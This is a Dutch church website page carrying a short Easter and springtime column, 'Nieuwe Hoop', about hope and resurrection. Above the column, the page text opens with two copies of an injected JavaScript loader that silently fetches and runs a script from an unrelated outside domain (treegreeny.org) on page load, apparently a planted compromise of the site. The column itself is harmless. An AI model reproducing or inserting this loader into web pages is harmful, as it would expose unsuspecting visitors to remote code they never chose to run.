;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuwe Hoop - PKN Damwâld

Nieuwe Hoop

Gepubliceerd op: dinsdag 11 april 2023

Het ruikt naar allerlei planten, de bomen worden groen, de voorjaarsbloemen bloeien in de mooiste kleuren en de bijen en vlinders beginnen zich te vermaken. Maar niet alleen de natuur en dieren ontwaken, ook mensen: ze worden naar buiten gelokt, de sfeer is vrolijk en hun geest komt op bij elke zonnestraal – zo ervaar ik het tenminste bij mezelf en in mijn omgeving. Met de heerlijke lentetemperaturen op komst groeit de hoop dat de winter eindelijk voorbij is en er geen vrieskou meer te verwachten is.

Bijna 2000 jaar geleden, kort na Pasen, was er nieuwe hoop voor een handjevol wanhopige mensen. Toen Jezus aan het kruis werd genageld en stierf, stierf ook bij zijn volgelingen de hoop op verandering en het begin van een nieuw tijdperk. Hulpeloos en wanhopig vroegen ze zich af wat de betekenis was van wat er was gebeurd en hoe het voor hen verder zou gaan. Maar al op de derde dag na zijn dood toont Jezus zich als de verrezen Christus, eerst aan de vrouwen en daarna aan enkele anderen. Jezus overwon de dood en bereidde daarmee de weg naar God voor alle mensen. God is sterker dan de dood en geeft nieuw leven. Als dat geen reden is om blij te zijn! Dit geeft hoop aan christenen toen en nu. Na de dood is het niet voorbij, want God belooft iedereen die in hem gelooft een nieuw leven met hem – zonder lijden en pijn, zonder ziekte en verdriet.

En elke lente herinnert God ons er zichtbaar aan dat hij alles nieuw maakt: de dagen worden langer, de duisternis trekt zich terug; de natuur bloeit, kleur komt tot leven; de zon verwarmt het hart, de stemming stijgt. God geeft nieuwe hoop en nieuw leven. Daarom: geniet van de lente en laad uw batterijen op met nieuwe hoop.

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns